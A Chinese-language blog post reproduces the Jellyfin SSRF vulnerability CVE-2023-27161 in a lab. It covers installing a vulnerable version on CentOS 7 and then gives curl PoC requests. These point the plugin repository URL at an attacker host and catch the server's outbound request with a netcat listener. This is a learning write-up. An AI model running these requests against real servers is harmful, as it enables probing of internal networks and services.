关于CVE-2023-27161 Jellyfin流媒体系统存在SSRF漏洞的学习
创始人
2025-05-29 06:29:43

漏洞描述:

Jellyfin 直到 v10.7.7 通过组件 /Repository 包含服务器端请求伪造 (SSRF)。此漏洞允许攻击者通过构建的 POST 请求访问网络资源和敏感信息。

环境及部署说明:

实验环境:Centos 7
试验机器IP地址:192.168.50.122:8096
攻击机器IP地址:192.168.50.254:2223
部署方式:

配置yum源

wget -O /etc/yum.repos.d/CentOS-Base.repo https://mirrors.aliyun.com/repo/Centos-7.reposed -i -e '/mirrors.cloud.aliyuncs.com/d' -e '/mirrors.aliyuncs.com/d' /etc/yum.repos.d/CentOS-Base.repowget -O /etc/yum.repos.d/epel.repo http://mirrors.aliyun.com/repo/epel-7.repo

配置rpmfusion源,安装ffmpeg

yum install epel-releasewget https://download1.rpmfusion.org/free/el/rpmfusion-free-release-7.noarch.rpmrpm -ihv rpmfusion-free-release-7.noarch.rpmyum install ffmpeg

下载jellyfin服务端相关rpm包

https://repo.jellyfin.org/archive/server/centos/stable/10.7.7/server/jellyfin-server-10.7.7-1.el7.x86_64.rpmhttps://repo.jellyfin.org/archive/server/centos/stable/10.7.7/server/jellyfin-10.7.7-1.el7.x86_64.rpmhttps://repo.jellyfin.org/archive/server/centos/stable/10.7.7/web/jellyfin-web-10.7.7-1.el7.noarch.rpm

在这里插入图片描述

yum本地安装jellyfin-server

yum localinstall jellyfin-web-10.6.4-1.el7.noarch.rpmyum localinstall jellyfin-server-10.6.4-1.el7.x86_64.rpmyum localinstall jellyfin-10.6.4-1.el7.x86_64.rpm 

在这里插入图片描述
在这里插入图片描述

启动jellyfin服务

systemctl enable jellyfin.servicesystemctl start jellyfin.servicenetstat -anp | grep 8096

在这里插入图片描述

测试过程

访问http://192.168.50.122:8096 测试地址,而后按照流程直接设置好后登录后台
在这里插入图片描述
漏洞位于插件模块(Repository )->存储库添加处,此处存在SSRF漏洞
在这里插入图片描述
首先,我们使用以下POC来获取系统本身的存储库:

curl -X GET "http://192.168.50.122:8096/Repositories" -H  "accept: application/json" -H  "x-emby-token: ea314abb3b444d769da3038c2afb8354"

在这里插入图片描述
输出如下:

[{"Name":"Jellyfin Stable","Url":"https://repo.jellyfin.org/releases/plugin/manifest-stable.json","Enabled":true}]

我们使用以下POC修改储存库

[{"Name":"Jellyfin Stable","Url":"http://192.168.50.254:2223/ssrf_test?param=1¶m2=3","Enabled":true}]

在这里插入图片描述
这时,我们再次获取仓库,输出如下:

[{"Name":"Jellyfin Stable","Url":"http://192.168.50.254:2223/ssrf_test?param=1\u0026param2=3","Enabled":true}]

在这里插入图片描述
我们此时发送如下请求,同时在192.168.50.254攻击机上开启2223监听端口

nc -lvvp 2223

在这里插入图片描述

curl -X GET "http://192.168.50.122:8096/Packages" -H  "accept: application/json" -H  "x-emby-token: ea314abb3b444d769da3038c2afb8354"

在这里插入图片描述
反回KALI攻击机,发现此时已经成功监听到请求
在这里插入图片描述

相关内容

热门资讯

OpenAI推出ChatGPT... 7月10日消息,OpenAI推出全新的ChatGPT Work智能体,由最新发布的前沿旗舰模型GPT...
MINIMAX:拟折让9.89... 7月10日消息,MINIMAX在港交所公告,将根据配售协议所载的条款及在其条件规限下,发行35,60...
美国商务部长敦促SK海力士和三... 7月10日消息,据报道,美国商务部长霍华德·卢特尼克呼吁三星电子和SK海力士加快扩大在美国的内存芯片...
新HIV疫苗在灵长类动物体内产... 7月10日消息,美国拉荷亚过敏与免疫研究所、斯克里普斯研究所,以及国际艾滋病疫苗行动组织的科学家携手...
内塔尼亚胡与特朗普通话,商定保... 7月10日消息,以色列总理办公室当地时间9日晚间发表声明称,以总理内塔尼亚胡当晚与美国总统特朗普通电...